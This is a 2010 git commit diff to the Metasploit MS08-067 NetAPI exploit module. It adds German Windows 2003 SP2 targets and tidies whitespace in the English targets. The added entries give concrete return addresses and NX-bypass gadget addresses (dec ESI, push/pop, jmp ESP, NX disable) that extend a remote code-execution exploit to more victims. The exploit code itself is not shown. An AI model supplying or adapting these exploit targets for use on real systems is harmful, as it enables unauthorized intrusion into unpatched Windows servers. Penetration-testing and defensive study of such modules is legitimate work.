add german target from contributor, thx!

git-svn-id: file:///home/svn/framework3/trunk@8601 4d416f70-5f16-0410-b530-b9f4589650da
2010-02-23 17:23:05 +00:00 · 2010-02-23 17:23:05 +00:00 · 81f93d48e7
parent 4ae27e32b0
commit 81f93d48e7
1 changed files with 25 additions and 4 deletions
--- a/modules/exploits/windows/smb/ms08_067_netapi.rb
+++ b/modules/exploits/windows/smb/ms08_067_netapi.rb
@ -141,14 +141,15 @@ class Metasploit3 < Msf::Exploit::Remote
 					# Brett Moore's crafty NX bypass for 2003 SP1
 					[ 'Windows 2003 SP1 English (NX)',
 						{
-							'RetDec'    => 0x7c90568c,	# dec ESI, ret @SHELL32.DLL
-							'RetPop'    => 0x7ca27cf4, 	# push ESI, pop EBP, ret @SHELL32.DLL
+							'RetDec'    => 0x7c90568c,	 # dec ESI, ret @SHELL32.DLL
+							'RetPop'    => 0x7ca27cf4,  # push ESI, pop EBP, ret @SHELL32.DLL
 							'JmpESP'    => 0x7c86fed3,  # jmp ESP @NTDLL.DLL
 							'DisableNX' => 0x7c83e413,  # NX disable @NTDLL.DLL
 							'Scratch'   => 0x00020408,
 						}
 					],

+
 					# Standard return-to-ESI without NX bypass
 					[ 'Windows 2003 SP2 English (NO NX)',
 						{
@ -160,8 +161,8 @@ class Metasploit3 < Msf::Exploit::Remote
 					# Brett Moore's crafty NX bypass for 2003 SP2
 					[ 'Windows 2003 SP2 English (NX)',
 						{
-							'RetDec'    => 0x7c86beb8,	# dec ESI, ret @NTDLL.DLL
-							'RetPop'    => 0x7ca1e84e, 	# push ESI, pop EBP, ret @SHELL32.DLL
+							'RetDec'    => 0x7c86beb8,  # dec ESI, ret @NTDLL.DLL
+							'RetPop'    => 0x7ca1e84e,  # push ESI, pop EBP, ret @SHELL32.DLL
 							'JmpESP'    => 0x7c86a01b,  # jmp ESP @NTDLL.DLL
 							'DisableNX' => 0x7c83f517,  # NX disable @NTDLL.DLL
 							'Scratch'   => 0x00020408,
@ -169,6 +170,26 @@ class Metasploit3 < Msf::Exploit::Remote
 					],


+					# Standard return-to-ESI without NX bypass
+					[ 'Windows 2003 SP2 German (NO NX)',
+						{
+							'Ret'       => 0x71a03969,
+							'Scratch'   => 0x00020408,
+						}
+					], # JMP ESI WS2HELP.DLL
+
+					# Brett Moore's crafty NX bypass for 2003 SP2
+					[ 'Windows 2003 SP2 German (NX)',
+						{
+							'RetDec'    => 0x7c98beb8,  # dec ESI, ret @NTDLL.DLL
+							'RetPop'    => 0x7cb3e84e,  # push ESI, pop EBP, ret @SHELL32.DLL
+							'JmpESP'    => 0x7c98a01b,  # jmp ESP @NTDLL.DLL
+							'DisableNX' => 0x7c95f517,  # NX disable @NTDLL.DLL
+							'Scratch'   => 0x00020408,
+						}
+					],
+
+
 					#
 					# NON-ENGLISH TARGETS - AUTOMATICALLY GENERATED
 					#